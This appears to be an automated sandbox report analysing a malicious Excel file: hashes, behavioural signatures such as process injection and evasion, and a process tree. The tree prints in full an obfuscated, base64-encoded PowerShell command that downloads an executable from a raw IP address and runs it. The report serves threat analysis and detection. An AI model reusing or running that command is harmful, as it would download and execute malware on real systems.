Analysis
max time kernel: 139s
max time network: 140s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 13-11-2024 02:46
Static task: static1
Behavioral task: behavioral1
Sample: aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls
Resource: win7-20240903-en
Behavioral task: behavioral2
Sample: aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls
Resource: win10v2004-20241007-en
General
Target: aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls
Size: 1.1MB
MD5: 8f3c11affc3d0195c96e4d1e4478e29c
SHA1: daad41a948964394469ac56db60e102515fe938f
SHA256: aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf
SHA512: 194efa4322ad42523eb4a8bfca941388eb645dde024712cbef2bd106d88407ff6f67ad3e6ddfdc8cbe7e7ba98a3fc6928092920c62d2b326e1bbb3b9784d0fa2
SSDEEP: 24576:Uq9PLiijE2Z5Z2am8VcYjgxPF84LJQodsJU1BnBsk7LRXA2r:UEPLiij7Z5ZK8VcYMpFjLJQodH1BXPR9
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes: mstsc.exe
description | pid | pid_target | Process | procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | 2360 | 3048 | mstsc.exe | 29
-
Blocklisted process makes network request 3 IoCs
Processes: mshta.exe, POwersHeLl.ExE
flow | pid | Process
12 | 2732 | mshta.exe
13 | 2732 | mshta.exe
15 | 2476 | POwersHeLl.ExE
-
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
Processes: powershell.exe, POwersHeLl.ExE
pid | Process
876 | powershell.exe
2476 | POwersHeLl.ExE
-
Executes dropped EXE 1 IoCs
Processes: wlanext.exe
pid | Process
1976 | wlanext.exe
-
Loads dropped DLL 2 IoCs
Processes: POwersHeLl.ExE, mstsc.exe
pid | Process
2476 | POwersHeLl.ExE
2360 | mstsc.exe
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource | yara_rule
behavioral1/files/0x0007000000018706-61.dat | autoit_exe
-
Drops file in System32 directory 2 IoCs
Processes: POwersHeLl.ExE, powershell.exe
description | ioc | Process
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | POwersHeLl.ExE
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
-
Suspicious use of SetThreadContext 4 IoCs
Processes: wlanext.exe, svchost.exe, mstsc.exe
description | pid | Process | procid_target
PID 1976 set thread context of 2124 | 1976 | wlanext.exe | 39
PID 2124 set thread context of 3048 | 2124 | svchost.exe | 29
PID 2124 set thread context of 2360 | 2124 | svchost.exe | 40
PID 2360 set thread context of 3048 | 2360 | mstsc.exe | 29
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes: POwersHeLl.ExE, powershell.exe, csc.exe, cvtres.exe, wlanext.exe, mstsc.exe, EXCEL.EXE, mshta.exe
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | POwersHeLl.ExE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | csc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cvtres.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | wlanext.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mstsc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | EXCEL.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mshta.exe
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes: EXCEL.EXE
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | EXCEL.EXE
-
Modifies Internet Explorer settings
Processes: mshta.exe, mstsc.exe
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
Key created | \Registry\User\S-1-5-21-3063565911-2056067323-3330884624-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | mstsc.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes: EXCEL.EXE
pid | Process
3048 | EXCEL.EXE
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes: POwersHeLl.ExE, powershell.exe, svchost.exe, mstsc.exe
pid | Process
2476 | POwersHeLl.ExE
876 | powershell.exe
2476 | POwersHeLl.ExE
2476 | POwersHeLl.ExE
2124 | svchost.exe
2124 | svchost.exe
2124 | svchost.exe
2124 | svchost.exe
2360 | mstsc.exe
2360 | mstsc.exe
2360 | mstsc.exe
2360 | mstsc.exe
-
Suspicious behavior: MapViewOfSection 6 IoCs
Processes: wlanext.exe, svchost.exe, EXCEL.EXE, mstsc.exe
pid | Process
1976 | wlanext.exe
2124 | svchost.exe
3048 | EXCEL.EXE
3048 | EXCEL.EXE
2360 | mstsc.exe
2360 | mstsc.exe
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes: POwersHeLl.ExE, powershell.exe
description | pid | Process
Token: SeDebugPrivilege | 2476 | POwersHeLl.ExE
Token: SeDebugPrivilege | 876 | powershell.exe
-
Suspicious use of SetWindowsHookEx 5 IoCs
Processes: EXCEL.EXE
pid | Process
3048 | EXCEL.EXE
3048 | EXCEL.EXE
3048 | EXCEL.EXE
3048 | EXCEL.EXE
3048 | EXCEL.EXE
-
Suspicious use of WriteProcessMemory 29 IoCs
Processes: mshta.exe, POwersHeLl.ExE, csc.exe, wlanext.exe, EXCEL.EXE
description | pid | Process | procid_target
PID 2732 wrote to memory of 2476 | 2732 | mshta.exe | 32
PID 2732 wrote to memory of 2476 | 2732 | mshta.exe | 32
PID 2732 wrote to memory of 2476 | 2732 | mshta.exe | 32
PID 2732 wrote to memory of 2476 | 2732 | mshta.exe | 32
PID 2476 wrote to memory of 876 | 2476 | POwersHeLl.ExE | 34
PID 2476 wrote to memory of 876 | 2476 | POwersHeLl.ExE | 34
PID 2476 wrote to memory of 876 | 2476 | POwersHeLl.ExE | 34
PID 2476 wrote to memory of 876 | 2476 | POwersHeLl.ExE | 34
PID 2476 wrote to memory of 768 | 2476 | POwersHeLl.ExE | 35
PID 2476 wrote to memory of 768 | 2476 | POwersHeLl.ExE | 35
PID 2476 wrote to memory of 768 | 2476 | POwersHeLl.ExE | 35
PID 2476 wrote to memory of 768 | 2476 | POwersHeLl.ExE | 35
PID 768 wrote to memory of 1992 | 768 | csc.exe | 36
PID 768 wrote to memory of 1992 | 768 | csc.exe | 36
PID 768 wrote to memory of 1992 | 768 | csc.exe | 36
PID 768 wrote to memory of 1992 | 768 | csc.exe | 36
PID 2476 wrote to memory of 1976 | 2476 | POwersHeLl.ExE | 38
PID 2476 wrote to memory of 1976 | 2476 | POwersHeLl.ExE | 38
PID 2476 wrote to memory of 1976 | 2476 | POwersHeLl.ExE | 38
PID 2476 wrote to memory of 1976 | 2476 | POwersHeLl.ExE | 38
PID 1976 wrote to memory of 2124 | 1976 | wlanext.exe | 39
PID 1976 wrote to memory of 2124 | 1976 | wlanext.exe | 39
PID 1976 wrote to memory of 2124 | 1976 | wlanext.exe | 39
PID 1976 wrote to memory of 2124 | 1976 | wlanext.exe | 39
PID 1976 wrote to memory of 2124 | 1976 | wlanext.exe | 39
PID 3048 wrote to memory of 2360 | 3048 | EXCEL.EXE | 40
PID 3048 wrote to memory of 2360 | 3048 | EXCEL.EXE | 40
PID 3048 wrote to memory of 2360 | 3048 | EXCEL.EXE | 40
PID 3048 wrote to memory of 2360 | 3048 | EXCEL.EXE | 40
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
Command line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls
PID: 3048
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\mstsc.exe
  Command line: "C:\Windows\SysWOW64\mstsc.exe"
  PID: 2360
  - Process spawned unexpected child process
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
C:\Windows\SysWOW64\mshta.exe
Command line: C:\Windows\SysWOW64\mshta.exe -Embedding
PID: 2732
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
  Command line: "C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'JEMzV3NmSEMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVyZEVGSU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ByeSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJcWloU2dPcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3l3UmhuUUdmS1IsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2JKYUdNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV25XVCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQzNXc2ZIQzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC42MS8zNDUvd2xhbmV4dHMuZXhlIiwiJEVOdjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3NUQVJULXNsZUVwKDMpO3NUYXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSI='+[chaR]0X22+'))')))"
  PID: 2476
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Loads dropped DLL
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt
    PID: 876
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tnpx6mte.cmdline"
    PID: 768
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC16C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC16B.tmp"
      PID: 1992
      - System Location Discovery: System Language Discovery
    C:\Users\Admin\AppData\Roaming\wlanext.exe
    Command line: "C:\Users\Admin\AppData\Roaming\wlanext.exe"
    PID: 1976
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\svchost.exe
      Command line: "C:\Users\Admin\AppData\Roaming\wlanext.exe"
      PID: 2124
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
Network
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize: 192B
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1
Filesize: 554B
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\seethebestthingswithgreatthingsbestthingswithgreatentry[1].hta
Filesize: 8KB
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize: 7KB